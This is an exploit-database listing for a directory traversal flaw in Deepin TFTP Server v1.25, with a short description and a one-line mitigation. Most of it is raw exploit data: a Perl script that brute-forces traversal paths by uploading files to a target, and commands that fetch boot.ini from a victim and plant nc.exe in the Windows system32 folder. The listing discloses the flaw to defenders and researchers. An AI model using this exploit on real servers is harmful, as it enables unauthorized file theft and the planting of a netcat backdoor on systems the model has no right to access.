Deepin TFTP Server Directory Traversal Vulnerability

vendor:

Deepin TFTP Server

by:

demonalex

5,5

CVSS

MEDIUM

Directory Traversal

CWE

Product Name: Deepin TFTP Server

Affected Version From: v1.25

Affected Version To: v1.25

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2010

Deepin TFTP Server Directory Traversal Vulnerability

Deepin TFTP Server does not properly sanitise filenames containing directory traversal sequences that are received from an FTP client. An attacker can use this vulnerability to gain access to sensitive files on the server. Proof of concept code is provided to demonstrate the vulnerability. Exploit code is provided to demonstrate how an attacker can use this vulnerability to gain access to sensitive files on the server.

Mitigation:

Ensure that the server is configured to properly sanitise filenames containing directory traversal sequences.

Source

Exploit-DB raw data:

#Software : Deepin TFTP Server Directory Traversal Vulnerability Software Version : v1.25
#Vendor: Deepin.org
#Vulnerability Published : 2010-08-14
#Vulnerability Update Time :
#Status : 
#Impact : Medium
#Bug Description :
#Deepin TFTP Server does not properly sanitise filenames containing directory traversal sequences that are #received from an FTP client.
#Proof Of Concept :
#****************************************************************
#!/usr/bin/perl -w
$|=1;
$target_ip=shift || die "usage: $0 \$target_ip\n"; @directory_traversal=( '..\tmp.txt', '..\..\tmp.txt', '..\..\..\tmp.txt', '..\..\..\..\tmp.txt', '..\..\..\..\..\tmp.txt', '..\..\..\..\..\..\tmp.txt', '..\..\..\..\..\..\..\tmp.txt'
);
open(TMP, ">tmp.txt");
print TMP "tmp";
close(TMP);
foreach $dt_content (@directory_traversal){
	$dt_it=`tftp.exe $target_ip put tmp.txt $dt_content`;
	print "command : tftp.exe $target_ip put tmp.txt $dt_content\n";
	print "$dt_it";
	if($dt_it=~m/^Transferred successfully/){
		print "Directory Traversal PAYLOAD is $dt_content.\n";
		print "Press [ENTER] Button to continue...\n";
		<STDIN>;
	}
	sleep(3);
}
print "Finish!\n";
exit(0);
#****************************************************************
#Exploit :
#****************************************************************
#get sensitive file
#c:\windows\system32>tftp [VICTIM_IP] get ../../boot.ini boot.ini put malware c:\windows\system32>tftp [VICTIM_IP] put nc.exe ../../WINDOWS/system32/nc.exe
#****************************************************************
#Credits : This vulnerability was discovered by demonalex(at)163(dot)com Pentester/Researcher Dark2S Security Team/Venustech.GZ Branch